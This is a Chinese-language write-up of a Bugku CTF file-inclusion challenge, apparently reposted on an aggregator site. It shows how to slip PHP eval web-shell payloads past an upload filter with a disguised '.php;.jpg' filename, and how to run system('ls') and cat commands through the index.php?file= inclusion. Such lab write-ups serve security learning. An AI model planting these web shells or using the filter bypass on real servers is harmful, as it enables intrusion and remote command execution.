文件包含2
flag格式:SKCTF{xxxxxxxxxxxxxxxx}
hint:文件包含
1.访问http://118.89.219.210:49166/查看源代码
2.将hello.php改成upload.php,访问
这里对上传的文件的格式和大小做了限制
3.上传一个图片马,burpsuite抓包改后缀为.php上传失败
4.这对文件的后缀也做了限制,%00截断不管用
5.换一种姿势上传,普通一句话会被过滤
这里构造<?=eval($_POST['shell']);>或
复制代码
1
2
3
4<script language=php> @eval($_POST[pupil]); </script>
保存文件修改后缀为2333.php;.jpg,成功上传
/upload/201804141155474379.jpg
直接用图片路径菜刀是连不上的
使用包含文件的方式访问
页面是空白的
使用菜刀连接
还是没法连接成功…..
6.那就直接构造命令执行
<script language=php>system("ls")</script>
同理,修改后缀名为jpg,如233.php;.jpg,上传成功
7.访问图片的包含路径
复制代码
1
2http://118.89.219.210:49166/index.php?file=upload/201804141202562458.jpg
或者构造命令执行
<script language=php>system("cat 访问的文件名.txt")</script>
包含文件的方式直接访问.txt文件
最后
以上就是可耐大地最近收集整理的关于bugku-文件包含2 writeup文件包含2的全部内容,更多相关bugku-文件包含2内容请搜索靠谱客的其他文章。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复